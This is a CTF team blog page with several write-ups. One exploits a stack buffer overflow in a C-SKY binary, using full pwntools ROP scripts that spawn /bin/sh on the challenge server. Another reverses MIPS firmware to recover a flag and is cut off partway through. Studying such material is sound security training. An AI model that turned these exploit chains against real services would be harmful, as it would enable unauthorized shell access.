Posts on TheRomanXpl0it

CSAW '25 Embedded Security Challenge Report

info@theromanxpl0.it (TRX) — Sun, 16 Nov 2025 15:26:06 +0100

We competed in the CSAW Embedded Security Challenge 2025, and after qualifying for the finals in Valence, we went on to win first place among 7 European teams.

We have decided to make our setup and challenge solutions open-source. See our Github repository.

TheRomanXpl0it - Qualification report

TheRomanXpl0it - Final report

TFC CTF 25 - Cromozominus Rex

info@theromanxpl0.it (TRX) — Tue, 02 Sep 2025 11:56:22 +0200

This challenge was the followup of Mucusuki, with only an additional check on the payload.
Since the programs are 99% identical, let’s start by analyzing the first one.

Mucusuki

In the attachments we find two binaries: mucusuki and qemu. There’s also a Dockerfile, which will be invaluable for the debugging step later.

As you might have imagined due to qemu, this is not the usual x86 binary. Let’s see:

ELF 32-bit LSB executable, C-SKY processor family, version 1 (SYSV), statically linked, stripped

C-SKY is a 32-bit chinese ISA based on RISC-V. But other than that, the challenge is a Linux userland program.

Unfortunately Ida did not support the C-SKY architecture, so we used ghidra with a plugin.
Here are a few excerpts of the decompiled code:

undefined4 entry(void)
{
  undefined4 uVar1;

  get_input();
  puts("Goodbye!\n");
  uVar1 = exit(0);
  return uVar1;
}

undefined4 get_input(void)
{
  undefined4 uVar1;
  undefined auStack_6c [100];

  write(1,"Give me something to read:\n",0x1b);
  uVar1 = read(0,auStack_6c,0x100);
  return uVar1;
}

We can see that the stack buffer is 100 bytes, but the program reads 0x100. A classic stack buffer overflow.

undefined4 syscall(undefined4 param_1,undefined4 param_2)
{
  trap_exception(0);
  return param_2;
}

This function will come in handy later. For now, know that system calls are triggered with trap 0 in C-SKY.

Well, we found the buffer overflow. But before we start ropping, a closer look at this architecture is in order.

C-SKY 101

There are a lot of registers, but we care only about a handful:

Register	Usage
`r0`	First argument (& return value)
`r1`	Second argument
`r2`	Third argument
`r3`	Fourth argument
`r7`	Syscall number
`r8`	Base pointer
`r14`	Stack pointer
`r15`	Link register (return address)

The return instruction on C-SKY (rts) does not pop the address from the stack, but jumps on the link register.
So we need to find gadgets that pop to r15 for the ROP chain.

Another important fact: the stack is not randomized. Every program execution has the same stack addresses (around 0x3ffff000). I did find a slight address discrepancy when running on Docker though.

Note that in both challenges the stack is executable.
I had already started with the ROP route, but you could flag mucusuki by jumping to shellcode in the buffer.

The syscall gadget

While the decompiled code is useful to get an overview of the program, to ROP we need to get to the assembly. Since my objdump did not support C-SKY, I just disassembled from gdb.

To help you understand the assembly I commented the instructions a bit:

// get_input
0x8150:	subi      	r14, r14, 8            // alloc 8 bytes in stack
0x8152:	st.w      	r15, (r14, 0x4)        // store link (retptr) in stack
0x8156:	st.w      	r8, (r14, 0x0)         // store base in stack
0x815a:	mov      	r8, r14                // rbp <- rsp
0x815c:	subi      	r14, r14, 100          // alloc 100 bytes in stack (buf)
0x815e:	movi      	r2, 27
0x8160:	lrw      	r1, 0x8424	// 0x8198  // string addr
0x8162:	movi      	r0, 1
0x8164:	bsr      	0x82dc	// 0x82dc      // call write
0x8168:	lsli      	r0, r0, 0              // nop
0x816c:	subi      	r3, r8, 100            // buf addr (relative to base)
0x8170:	movi      	r2, 128
0x8172:	lsli      	r2, r2, 1              // 128 << 1 = 0x100
0x8174:	mov      	r1, r3
0x8176:	movi      	r0, 0
0x8178:	bsr      	0x828c	// 0x828c      // call read
0x817c:	lsli      	r0, r0, 0              // nop
0x8180:	mov      	r0, r0
0x8182:	mov      	r14, r8                // restore base stack
0x8184:	ld.w      	r15, (r14, 0x4)        // load old link reg
0x8188:	ld.w      	r8, (r14, 0x0)         // load old base reg
0x818c:	addi      	r14, r14, 8            // dealloc 8 bytes
0x818e:	rts                                // return (r15 addr)

Now that you’ve got the gist of it, let’s see the syscall function:

// syscall
0x8208:	subi      	r14, r14, 8
0x820a:	st.w      	r8, (r14, 0x4)
0x820e:	st.w      	r7, (r14, 0x0)
0x8210:	mov      	r8, r14
0x8212:	subi      	r14, r14, 16
0x8214:	subi      	r12, r8, 4
0x8218:	st.w      	r0, (r12, 0x0)  // store r0 (sysnr) in stack
0x821c:	subi      	r0, r8, 8
0x8220:	st.w      	r1, (r0, 0x0)   // store r1 (arg1) in stack
0x8222:	subi      	r1, r8, 12
0x8226:	st.w      	r2, (r1, 0x0)   // store r2 (arg2) in stack
0x8228:	subi      	r2, r8, 16
0x822c:	st.w      	r3, (r2, 0x0)   // store r3 (arg3) in stack
0x822e:	subi      	r3, r8, 8
0x8232:	ld.w      	r0, (r3, 0x0)   // load r8-8 (arg1) to r0
0x8234:	subi      	r3, r8, 12
0x8238:	ld.w      	r1, (r3, 0x0)   // load r8-12 (arg2) to r1
0x823a:	subi      	r3, r8, 16
0x823e:	ld.w      	r2, (r3, 0x0)   // load r8-16 (arg3) to r2
0x8240:	subi      	r3, r8, 4
0x8244:	ld.w      	r12, (r3, 0x0)  // load r8-4 (sysnr) to r12
0x8248:	andi      	r3, r12, 255
0x824c:	subi      	r3, 21          // sub 21 from the sysnr
0x824e:	mov      	r7, r3          // move sysnr to r7
0x8250:	trap      	0               // exec syscall
0x8254:	mov      	r3, r0
0x8256:	mov      	r0, r3
0x8258:	mov      	r14, r8
0x825a:	ld.w      	r8, (r14, 0x4)
0x825e:	ld.w      	r7, (r14, 0x0)
0x8260:	addi      	r14, r14, 8
0x8262:	rts

As we can see this function does a bit more than what ghidra decompiled. Let’s rewrite it in pseudo code:

undefined syscall(sysnr, arg1, arg2, arg3)
{
    int tmp[4];   // r8-4
    tmp[0] = sysnr;
    tmp[1] = arg1;
    tmp[2] = arg2;
    tmp[3] = arg3;
    r0 = tmp[1];
    r1 = tmp[2];
    r3 = tmp[3];
    r7 = (tmp[0] & 255) - 21;
    trap_exception(0);
}

To swap the registers appropriately for the syscall calling convention, they are stored and loaded from the stack.
Thus, we can store the register values that we want in the stack and jump in the middle of the function.

Also, note how 21 is subtracted from the syscall number (r7) after it was masked by 255.

The exploit

With gdb we can figure out the fixed stack position of the input buffer. The simplest way is adding a breakpoint to the read call and printing the registers:

I found here that the syscall number for execve is 221 on C-SKY.

Since we can overwrite the stack base pointer, we can pivot the stack to an offset within our injected data.
The following payload calls syscall(221+21, "/bin/sh", 0, 0):

def main():
    r = conn()

    # r8-16 : r2  -> arg2
    # r8-12 : r1  -> arg1
    # r8-8  : r0  -> arg0
    # r8-4  : r12 -> syscall_no+21
    stack = 0x3ffffecc

    payload = fit({
        0: p32(0),
        4: p32(0),
        8: p32(stack+32),
        12: p32(221+21), #execve
        32: b"/bin/sh\0",
    })

    payload = payload.ljust(100, b'\0')
    payload += p32(stack+16)  # set stack
    payload += p32(0x822e)    # set retptr

    r.sendlineafter(b"read:", payload)
    r.interactive()

Finally we can get that flag:

TFCCTF{t0_beat_mcsky_y0u_had_to_csky_now_go_after_cromozominus}

Let’s follow this advice and move on to cromozominus.

Cromozominus Rex

Similarly to before, we get the crorex and qemu binaries.

The program is the same, except for the get_input function.
A huge if statement was added to check if disallowed bytes were present in the buffer. If they are found, the function calls exit instead of returning, skipping our ROP chain.

// get_input @ 0x00823c
void get_input(void)
{
  int len;
  byte buffer[100];
  uint c;
  int max_loop;
  int idx;

  write(1,"Give me something to read:\n",0x1b);
  len = read(0,buffer,0x100);

  max_loop = len;
  for (idx = 0; idx < max_loop; idx = idx + 1) {
    c = (uint)buffer[idx];

    if (((((((((c == 1) || (c == 2)) || (c == 3)) ||
            ((c == 6 || (c == 7)))) ||
           ((((((c == 9 || ((c == 10 || (c == 0xb)))) || (c == 0xd)) ||
              ((((c == 0xe || (c == 0xf)) || (c == 0x11)) ||
               (((c == 4 || (c == 0x13)) ||
                ((c == 0x14 || ((c == 0x15 || (c == 0x16)))))))))) ||
             (((c == 0x1d ||
               ((((c == 0x1e || (c == 0x1f)) || (c == 0x20)) ||
                ((c == 0x21 || (c == 0x22)))))) ||
              ((c == 0x23 || ((c == 0x2a || (c == 0x2b)))))))) ||
            (c == 0x2d)))) ||
          ((((((((c == 0x30 || (c == 0x31)) || (c == 0x32)) ||
               ((c == 0x34 || (c == 0x3a)))) || (c == 0x3b)) ||
             ((c == 0x3d || (c == 0x40)))) ||
            ((c == 0x42 || (((c == 0x48 || (c == 0x4b)) || (c == 0x4e)))
             ))) || (((((c == 0x50 || (c == 0x54)) || (c == 0x5a)) ||
                      ((c == 0x5b || (c == 0x5d)))) ||
                     ((((c == 0x5f ||
                        (((c == 0x60 || (c == 99)) || (c == 0x6a)))) ||
                       ((c == 0x6b || (c == 0x6d)))) || (c == 0x6f)))))))) ||
         (((c == 0x72 || (c == 0x78)) ||
          ((c == 0x7b ||
           ((((c == 0x7e || (c == 0x7f)) || (c == 0x80)) ||
            ((c == 0x84 || (c == 0x8a)))))))))) ||
        (((c == 0x8b || ((c == 0x8d || (c == 0x8f)))) ||
         ((((c == 0x90 || (((c == 0x95 || (c == 0x9a)) || (c == 0x9b))))
           || (((c == 0x9d || (c == 0x9f)) || (c == 0xa2)))) ||
          (((c == 0xa5 || (c == 0xab)) ||
           ((c == 0xad || (((c == 0xaf || (c == 0xb2)) || (c == 0xb5))))
           )))))))) ||
       ((((c == 0xbb || (c == 0xbd)) ||
         ((c == 0xbf ||
          (((((c == 0xc2 || (c == 200)) ||
             ((c == 0xcb ||
              ((((c == 0xcd || (c == 0xce)) || (c == 0xd2)) ||
               ((c == 0xd4 || (c == 0xd5)))))))) || (c == 0xd9)) ||
           ((c == 0xda || (c == 0xdf)))))))) ||
        ((((c == 0x18 || (((c == 0xe4 || (c == 0xe5)) || (c == 0xe9))))
          || (((c == 0xed || (c == 0xee)) || (c == 0xf1)))) ||
         ((c == 0xf2 || (c == 0xfa)))))))) {
      exit(0);
    }
  }
}

Here’s the list of the 98 disallowed values:

[ 1, 2, 3, 6, 7, 9, 10, 0xb, 0xd, 0xe, 0xf, 0x11, 4, 0x13, 0x14, 0x15, 0x16, 0x1d, 0x1e, 0x1f, 0x20, 0x21, 0x22, 0x23, 0x2a, 0x2b, 0x2d, 0x30, 0x31, 0x32, 0x34, 0x3a, 0x3b, 0x3d, 0x40, 0x42, 0x48, 0x4b, 0x4e, 0x50, 0x54, 0x5a, 0x5b, 0x5d, 0x5f, 0x60, 99, 0x6a, 0x6b, 0x6d, 0x6f, 0x72, 0x78, 0x7b, 0x7e, 0x7f, 0x80, 0x84, 0x8a, 0x8b, 0x8d, 0x8f, 0x90, 0x95, 0x9a, 0x9b, 0x9d, 0x9f, 0xa2, 0xa5, 0xab, 0xad, 0xaf, 0xb2, 0xb5, 0xbb, 0xbd, 0xbf, 0xc2, 200, 0xcb, 0xcd, 0xce, 0xd2, 0xd4, 0xd5, 0xd9, 0xda, 0xdf, 0x18, 0xe4, 0xe5, 0xe9, 0xed, 0xee, 0xf1, 0xf2, 0xfa ]

I tried to adapt the payload of the previous challenge. Unfortunately the address of the syscall gadget (0x8806) contained a forbidden byte. Furthermore, the syscall number for execve was also blocked 🥹

Apparently these were collateral victims, and the author did not block them for this reason…

Let’s move on. Since this time our ret2win gadget is unavailable, we’ll need to craft a proper ROP chain.

The chain

My first idea was to use the sigreturn syscall to setup the registers for an execve. After reading a bit of the Linux source code, I gave up on that.

At this point, I was thinking of splitting the payload and calling read a second time.
I noticed in the read function a pattern very similar to that found in the syscall gadget: registers are stored on the stack when being swapped around.

// read
0x8864:	subi      	r14, r14, 8
0x8866:	st.w      	r15, (r14, 0x4)
0x886a:	st.w      	r8, (r14, 0x0)
0x886e:	mov      	r8, r14
0x8870:	subi      	r14, r14, 12
0x8872:	subi      	r3, r8, 4
0x8876:	st.w      	r0, (r3, 0x0)
0x8878:	subi      	r3, r8, 8
0x887c:	st.w      	r1, (r3, 0x0)
0x887e:	subi      	r3, r8, 12
0x8882:	st.w      	r2, (r3, 0x0)
0x8884:	subi      	r3, r8, 8
// read gadget
0x8888:	ld.w      	r2, (r3, 0x0)
0x888a:	subi      	r3, r8, 12
0x888e:	subi      	r1, r8, 4
0x8892:	ld.w      	r3, (r3, 0x0)
0x8894:	ld.w      	r1, (r1, 0x0)
0x8896:	movi      	r0, 84
0x8898:	bsr      	0x87e0	// 0x87e0    // syscall
0x889c:	lsli      	r0, r0, 0
0x88a0:	mov      	r3, r0
0x88a2:	mov      	r0, r3
0x88a4:	mov      	r14, r8
0x88a6:	ld.w      	r15, (r14, 0x4)
0x88aa:	ld.w      	r8, (r14, 0x0)
0x88ae:	addi      	r14, r14, 8
0x88b0:	rts

Thus, I started looking for suitable gadgets in the the whole program.

This gadget pops from the stack r8, then stores that value in r3.

// setr3 gadget
0x87c0:	ld.w      	r15, (r14, 0x4)
0x87c4:	ld.w      	r8, (r14, 0x0)
0x87c8:	mov      	r3, r8
0x87ca:	addi      	r14, r14, 8
0x87cc:	mov      	r8, r14
0x87ce:	rts

This one simply pops the base pointer r8 and returns.

// ret gadget
0x88a6:	ld.w      	r15, (r14, 0x4)
0x88aa:	ld.w      	r8, (r14, 0x0)
0x88ae:	addi      	r14, r14, 8
0x88b0:	rts

Debugging

This was one of the first times I tried a challenge in an exotic architecture (reading as in, not x86). Debugging this kind of challenge is always hard, as pwntools’ gdb.attach simply won’t work when qemu and Docker enter the mix.

So, I spent quite a bit of time preparing a comfortable gdb setup. Since this helped me lots, I think it’s worth sharing.

First of all, I exposed a port for qemu’s gdbserver:

EXPOSE 1235/tcp
CMD ["socat","-d","-d","-x","TCP-LISTEN:1337,reuseaddr,fork","EXEC:env -i ./qemu -g 1235 ./crorex,stderr,setsid"]

Then in my solve script I added a command to spawn a terminal with gdb:

with open('args.gdb','w') as f:
    f.write(GDB_ARGS)
    f.write("set architecture csky\n")
    f.write("target remote localhost:1235\n")

process(context.terminal + ["sh", "-c", f"sleep 1; sudo gdb -x args.gdb {e.path}"])

At this point I got a gdb window connected to the remote executable.
However, we immediately stumble upon another point of frustration: pwndbg has no support whatsoever for C-SKY 🥀

I needed a way to mitigate the pain of only being able to use the TUI layouts and the default commands…
So I made this small script to help me associate addresses with function names.

# start - end address
syms = {
    "get_input": (0x000823c, 0x8770),
    "entry": (0x8778, 0x87ae),
    "syscall": (0x087e0, 0x883a),
    "syscall_noret": (0x0883c, 0x8860),
    "read": (0x08864, 0x88b0),
    "write": (0x000088b4, 0x8900),
    "exit": (0x0008904, 0x8936),
    "strlen": (0x08938, 0x8986),
    "puts": (0x008988, 0x89ca),
}

with open("sym.S", "w") as f:
    f.write("""
        .text
    """)
    for sym, (start, end) in syms.items():
        end+=1
        f.write(f"""
        .globl {sym}
        .type {sym}, @function
        .org {start:#x}
    {sym}:
        .space ({end:#x}-{start:#x})
        .size {sym}, {end:#x}-{start:#x}
        """)

import os
os.system("as -g sym.S -o sym.o")

This script produces an object file that can be loaded with add-symbol-file sym.o 0x0.
Not the end of the world, but we can finally see where the exploit is jumping around 😉

Final script

This is the flow of the first payload:

setup the buffer with fd (0), size (0xff) and buffer address
set r3 to the buffer address + 16
set r8 to the buffer address + 16
call the read gadget
do the second stage (basically mucusuki’s payload)

from pwn import *

e = ELF("./crorex")
context.terminal = ["alacritty","-e"]

GDB_ARGS="""
layout asm
layout regs
add-symbol-file sym.o 0x0
b get_input
b exit
b *0x8738
b *0x8936
b *0x8770
"""

def conn():
    if args.LOCAL:
        r = process(["./qemu", "-g", "1235", e.path], env={})
    else:
        if args.DOCKER:
            nc = "localhost 1337"
            ssl = False
        else:
            nc = "ncat --ssl crorex-e073519243d25f48.challs.tfcctf.com 1337"
            ssl = True

        addr, port = nc.strip().split()[-2:]
        r = remote(addr, port, ssl=ssl)

    if args.GDB:
        with open('args.gdb','w') as f:
            f.write(GDB_ARGS)
            f.write("set architecture csky\n")
            f.write("target remote localhost:1235\n")

        process(context.terminal + ["sh", "-c", f"sleep 1; sudo gdb -x args.gdb {e.path}"])

    return r

def main():
    r = conn()

    stack = 0x3ffffebc

    payload = fit({
        16 - 12: p32(0xff),
        16 - 4: p32(0),
        16 - 0: p32(stack),
    }, filler = b'\0')

    payload = payload.ljust(112, b'\0')
    payload += p32(0)
    payload += p32(stack) #rbp

    # set r3
    payload += p32(0x87c0)
    payload += p32(stack+16)

    # set r8
    payload += p32(0x88a6)
    payload += p32(stack+16)

    # read
    # [r3-0] -> buf
    # [r8-12] -> size
    # [r8-4] -> fd
    payload += p32(0x8888)

    r.sendafter(b"read:", payload)

    ### SECOND PAYLOAD ###
    pause(2)

    payload = fit({
        0: p32(0),
        4: p32(0),
        8: p32(stack+32),
        12: p32(221+21), #execve
        32: b"/bin/sh\0",
    })

    payload = payload.ljust(132, b'\0')
    payload += p32(stack+140)
    payload += p32(stack+140)
    payload += p32(stack+16)
    payload += p32(0x8806)

    r.send(payload)
    r.interactive()

if __name__ == "__main__":
    main()

Fun fact: I finished this script and got the flag at 4AM 🙏

TFCCTF{cromozominus_pulisaki_in_redacted_cro++_crorex_crovid}

UIUCTF 25 - Damaged SoC

info@theromanxpl0.it (TRX) — Sun, 10 Aug 2025 00:00:00 +0000

Due to previous X ray damage, a part of SoC bFlash memory is corrupted. The board is unable to pass self-verification and boot. :/

Looks like our SoC was hit by a cosmic ray that flipped a few bits, let’s try to make sense of it and reverse the damage in order to get our board back up and running.

Quick rundown

We’re given a SystemVerilog-simulated IC that is (fortunately) already precompiled for us with Verilator; I won’t go in depth into what SystemVerilog is and how it works in this writeup, but feel free to dive deeper on your own, the gist of it is — it’s a hardware description and verification language that uses the synthesizable subset to describe CPUs, memories, MMIO blocks and other components to model hardware, which can then be simulated by open or closed-source simulators like Verilator, Modelsim, etc.

The challenge hands us a metric ton of files:

├── infra
│   └── src
│       ├── modules
│       │   ├── adder.sv
│       │   ├── barrel_rotator32.sv
│       │   ├── barrel_shifter32.sv
│       │   ├── configurations.sv
│       │   ├── core_branch.sv
│       │   ├── core_forward.sv
│       │   ├── core_hazard.sv
│       │   ├── data_mem.sv
│       │   ├── mips_decoder.sv
│       │   ├── mips_define.sv
│       │   ├── mux.sv
│       │   ├── register.sv
│       │   └── structures.sv
│       ├── SOC.sv
│       └── units
│           ├── alu.sv
│           ├── au.sv
│           ├── core_EX.sv
│           ├── core_ID.sv
│           ├── core_IF.sv
│           ├── core_MEM.sv
│           ├── core.sv
│           ├── cp0.sv
│           ├── lu.sv
│           ├── regfile.sv
│           ├── stdout.sv
│           ├── timer.sv
│           └── VGA.sv
├── memory.mem
└── SOC_run_sim

but we don’t need to go through all of them to understand what it does, in short:

infra/src contains the register transfer level for the whole SoC, it’s the high abstraction layer that describes how data is transformed as it is passed from register to register, it contains SOC.sv, which is the top level, data_mem.sv, which models the memory (more on this later), CPU pipeline stages, peripherals (UART/stdout, etc.) and all the support modules that together model the hardware the simulator runs.
memory.mem is a text-hex file in $readmemh format (text, lines with @ADDR followed by hex bytes). Verilog allows you to initialize memory from a text file with either hex or binary values, in our case, data_mem.sv shows $readmemh("memory.mem", data_seg);
SOC_run_sim, our executable, runs the simulation, loads a hex memory file (memory.mem) and starts up a MIPS64 little-endian CPU.

But let’s cut to the chase, what is all of this actually doing?

$ ./SOC_run_sim
Bootloading
Starting verification:
Incorrect key
HALT

Well… not much right now.

Why is this happening? Well, the author mentioned that the memory is “corrupted”, analyzing memory.mem we can see what’s happening:

@00000000
28 09 00 00
00 00 00 00
ef bf bd ef
bf bd ef bf
...

The first few lines contain several EF BF BD (the UTF-8 replacement character, “�”), a clear sign of corruption.

Our goal is to recover the boot ROM from the corrupted image, decompile, understand the “key” check (as we will see, the flag itself), craft the correct string and patch the memory so the verification passes and the board “boots.”

Decompiling

Like many modern reverse engineering challenges, this step won’t be as easy as throwing the binary into IDA or Ghidra, it’s a little trickier than that. Running SOC_run_sim through IDA awakens cosmic horrors that are best left undisturbed:

Enter sus.py, courtesy of my teammate @nect.

f = open('memory.mem')

block={}

cur = -1
acc = b""

for l in f.readlines():
    if l.startswith('@'):
        if cur >= 0:
            block[cur] = acc

        acc = b""
        cur = int(l[1:], 16)
    else:
        for x in l.split():
            acc += int(x,16).to_bytes(1)

if cur >= 0:
    block[cur] = acc

o = open('out.bin', 'wb')

last_addr = 0
for addr, mem in sorted(block.items()):
    print("Addr:", addr)
    print(mem)

    o.write(b"\0"*(addr-last_addr))
    last_addr=addr+len(mem)
    o.write(mem)

It reads memory.mem, groups blocks by address (@...) and concatenates bytes, filling gaps with zeros, and writes everything to out.bin.

We can now repeat the previous step and decompile the newly obtained file with IDA,

File format: Binary file (raw).
CPU: mipsl, ABI n64.
Base address: 0x0.

Much better. The main code starts at 0x100, it immediately prints:

"Bootloading\n"
"Starting verification:"

using a “UART print” routine (sub_838) that writes to MMIO 0x20000010.

Running strings on out.bin lends us a few extra insights (and a little waste of time):

GCC: (GNU) 15.1.
xVB40
hB4x
2B4&
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
Bootloading
Starting verification:
Incorrect key
HALT
===verification passed!===
vq{uv|qw
Incorrect key

vq{uv|qw

flag[15] = key[0]-16 = 'v'(118)-16 = 102 = 'f'
flag[16] = key[1]-16 = 'q'(113)-16 = 97 = 'a'
flag[17] = key[2]-16 = '{'(123)-16 = 107 = 'k'
flag[18] = key[3]-16 = 'u'(117)-16 = 101 = 'e'
flag[19] = key[4]-16 = 'v'(118)-16 = 102 = 'f'
flag[20] = key[5]-16 = '|'(124)-16 = 108 = 'l'
flag[21] = key[6]-16 = 'q'(113)-16 = 97 = 'a'
flag[22] = key[7]-16 = 'w'(119)-16 = 103 = 'g'`

… Let’s move on.

Time to Rev

In sub_100 the firmware sets the key pointer to the data blob starting at unk_8(memory offset 0x00000008 in memory.mem) and passes it to sub_208 as arg_18, the pointer to the candidate flag buffer (which I’ll call buf in the following examples)

dli   $v0, unk_8
sd    $v0, 0x70+var_58($sp)

The core of the flag verification lies in the function labelled sub_208 by IDA, its prologue checks that v0 == 0, if it does, it jumps to the verification step loc_224, otherwise it makes a simulator syscall (0x6D8) and returns:

ROM:0000000000000208  nop
ROM:000000000000020C  lw     $v0, arg_0($sp) ; load first argument (stack slot IDA named arg_0)
ROM:0000000000000210  beqz   $v0, loc_224   ; if (v0 == 0) jump to verification
ROM:0000000000000214  nop                   ; branch-delay slot
ROM:0000000000000218  syscall 0x6D8        ; else: make a simulator syscall/trap
ROM:000000000000021C  jr     $ra            ; and return immediately
ROM:0000000000000220  nop

1. Prefix check: `uiuctf{` (bytes 0..6)

ld    $v0, arg_18($sp)   ; buf
lb    $v0, 0($v0)        ; buf[0]
xori  $v0, 0x75          ; 'u'
sltiu $v0, 1
andi  $v0, 0xFF
move  $v1, $v0

ld    $v0, arg_18($sp)
daddiu $v0, 1
lb    $v0, 0($v0)        ; buf[1]
xori  $v0, 0x69          ; 'i'
... (same pattern for 'u','c','t','f','{')
daddiu $v0, 6
lb    $v0, 0($v0)        ; buf[6]
xori  $v0, 0x7B          ; '{'
...
li    $v0, 7
bne   $v1, $v0, loc_318  ; require all 7 matches

in pseudoC:

if ( (*a12 == 0x75LL)  // 'u'
    + (a12[1] == 0x69LL)  // 'i'
    + (a12[2] == 0x75LL)  // 'u'
    + (a12[3] == 0x63LL)  // 'c'
    + (a12[4] == 0x74LL)  // 't'
    + (a12[5] == 0x66LL)  // 'f'
    + (a12[6] == 0x7BLL) == 7LL )  // '{'

flag = uiuctf{

2. Mirror pattern for bytes 7 to 12

A loop runs with i = 0..5 (stored in idx at 0xC($sp)), splitting into cases:

i == 0 or 2 → buf[i] == buf[i+7] + 0x20 (lowercase equals uppercase + 32) -> loc_410 routine
i == 1 → buf[i+7] == '_' -> loc_45C routine
i == 3,4,5 → buf[i] == buf[i+7] -> loc_45C/loc_4A0 routines

loc_3F4:
  lw    $v0, 0xC($sp)           ; idx
  beqz  $v0, loc_410            ; idx == 0 → case 1 (lowercase = uppercase+0x20)
  ...
  lw    $v1, 0xC($sp)
  li    $v0, 2
  bne   $v1, $v0, loc_45C       ; idx != 2 → cases 2/3

  ...
loc_410:                         ; case 1: idx==0 or idx==2
  lw    $v0, 0xC($sp)           ; idx
  ld    $v1, 0x18($sp)          ; buf
  daddu $v0, $v1, $v0
  lb    $v0, 0($v0)             ; a0 = buf[idx]
  move  $a0, $v0
  lw    $v0, 0xC($sp)
  daddiu $v0, 7
  ld    $v1, 0x18($sp)
  daddu $v0, $v1, $v0
  lb    $v0, 0($v0)             ; v0 = buf[idx+7]
  addiu $v0, 0x20               ; v0 += 0x20
  xor   $v0, $a0, $v0           ; buf[idx] == buf[idx+7] + 0x20
  sltiu $v0, 1
  andi  $v0, 0xFF
  ... accumulate into ok-bit ...

loc_45C:                         ; cases 2/3
  lw    $v1, 0xC($sp)
  li    $v0, 1
  bne   $v1, $v0, loc_4A0        ; if idx != 1 → case 3
  ...
  ; case B: idx == 1 → enforce underscore at buf[idx+7]
  lw    $v0, 0xC($sp)
  daddiu $v0, 7
  ld    $v1, 0x18($sp)
  daddu $v0, $v1, $v0
  lb    $v0, 0($v0)              ; buf[idx+7]
  xori  $v0, 0x5F                ; '_'
  sltiu $v0, 1
  ...

loc_4A0:                         ; case 3: idx in {3,4,5} → equality
  lw    $v0, 0xC($sp)
  ld    $v1, 0x18($sp)
  daddu $v0, $v1, $v0
  lb    $v1, 0($v0)              ; buf[idx]
  lw    $v0, 0xC($sp)
  daddiu $v0, 7
  ld    $a0, 0x18($sp)
  daddu $v0, $a0, $v0
  lb    $v0, 0($v0)              ; buf[idx+7]
  xor   $v0, $v1, $v0            ; buf[idx] == buf[idx+7]
  sltiu $v0, 1
  ...

in pseudoC:

for (int i = 0; i < 6; i++) {
    if (i == 0 || i == 2) ok &= (buf[i] == (char)(buf[i+7] + 0x20));
    else if (i == 1)      ok &= (buf[i+7] == '_');
    else                  ok &= (buf[i] == buf[i+7]); // i in {3,4,5}
}

TL;DR: positions 7..12 mirror 0..5 as uppercase/same; position 8 is _

flag = uiuctf{U_Uctf

3. Stand-alone character checks

buf[13] == '_':

ld     $v0, 0x18($sp)
daddiu $v0, 0xD
lb     $v0, 0($v0)
xori   $v0, 0x5F          ; '_'
sltiu  $v0, 1
...

buf[14] == 'm' and buf[15] == '1':

ld     $v0, 0x18($sp)
daddiu $v0, 0xE
lb     $v1, 0($v0)
li     $v0, 0x6D          ; 'm'
bne    $v1, $v0, loc_630   ; fail if not 'm'
...
ld     $v0, 0x18($sp)
daddiu $v0, 0xF
lb     $v1, 0($v0)
li     $v0, 0x31          ; '1'
bne    $v1, $v0, loc_630

buf[28] == '_':

ld     $v0, 0x18($sp)
daddiu $v0, 0x1C
lb     $v1, 0($v0)
li     $v0, 0x5F          ; '_'
bne    $v1, $v0, loc_630

buf[23] + buf[24] == 'S'

ld     $v0, 0x18($sp)
daddiu $v0, 0x17      ; buf[23]
lb     $v0, 0($v0)
move   $v1, $v0
ld     $v0, 0x18($sp)
daddiu $v0, 0x18      ; buf[24]
lb     $v0, 0($v0)
addu   $v0, $v1, $v0  ; sum
li     $v0, 0x53      ; 'S'
bne    $v1, $v0, loc_630

'#' (0x23) + '0' (0x30) = 'S' (0x53)

flag = uiuctf{U_Uctf_m1.......#0...._

4. Tail check: bytes 29..37 must be `abcdefghi`

Loop indexed by arg_8, 9 iterations:

loc_330:
  lw    $v0, arg_8($sp)
  addiu $v0, 0x1E        ; +30
  daddiu $v0, -1         ; +29
  ld    $v1, arg_18($sp)
  daddu $v0, $v1, $v0
  lb    $v1, 0($v0)      ; buf[29 + i]

  dli   $v0, 0
  lw    $a0, arg_8($sp)
  daddiu $v0, aAbcdefghijklmn  ; "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ012345678"
  daddu $v0, $a0, $v0
  lb    $v0, 0($v0)      ; table[i]  → starts at 'a'
  xor   $v0, $v1, $v0    ; buf[29+i] == table[i]
  ...
  lw    $v0, arg_8($sp)
  addiu $v0, 1
  sw    $v0, arg_8($sp)

loc_390:
  lw    $v0, arg_8($sp)
  slti  $v0, 9           ; i < 9
  bnez  $v0, loc_330

in pseudoC:

for ( i = 0; i < 9LL; ++i )
      v14 = (unsigned __int8)v14 & ((char)a12[i + 29] == (unsigned __int64)aAbcdefghijklmn[i]);

flag = uiuctf{U_Uctf_m1.......#0...._abcdefghi}

5. Central 8+4 byte mixing (bytes 16..23 and 24..27)

This is the trickiest part, this block derives two accumulators from 8 bytes at [16..23] and 4 bytes at [24..27], mixes with constants, rotates, cross-mixes, and compares to targets:

Load + constants + first XOR:

ld    $v0, 0x18($sp)
ld    $v0, 0x10($v0)     ; packs buf[16..23] into 64b (little-endian)
sd    $v0, 0x20($sp)     ; save as x

ld    $v0, 0x18($sp)
lw    $v0, 0x18($v0)     ; packs buf[24..27] into 32b (little-endian)
sw    $v0, 0x28($sp)     ; save as y

dli   $v0, 0x1337C0DE12345678
sd    $v0, 0x30($sp)     ; c64
li    $v0, 0x3EADBE3F
sw    $v0, 0x38($sp)     ; c32

ld    $v1, 0x30($sp)     ; c64
ld    $v0, 0x20($sp)     ; x
xor   $v0, $v1, $v0
sd    $v0, 0x30($sp)     ; x ^= c64

lw    $v1, 0x38($sp)     ; c32
lw    $v0, 0x28($sp)     ; y
xor   $v0, $v1, $v0
sw    $v0, 0x38($sp)     ; y ^= c32

Rotate-left and adds:

; rol64(x,8) via shifts/ors then add 0x0123456789ABCDEF
...
dli   $v0, 0x123456789ABCDEF
daddu $v0, $v1, $v0    ; x += 0x0123456789ABCDEF
sd    $v0, 0x30($sp)

; rol32(y,4) then add 0x87654321
li    $v0, 0xFFFFFFFF87654321
addu  $v0, $v1, $v0    ; y += 0x87654321
sw    $v0, 0x38($sp)

Cross-mix + final XORs + compare:

; x ^= (uint64)y << 32
; y ^= (uint32)x
...
dli   $v0, 0xFEDCBA9876543210
xor   $v0, $v1, $v0     ; x ^= 0xFEDC...
sd    $v0, 0x30($sp)

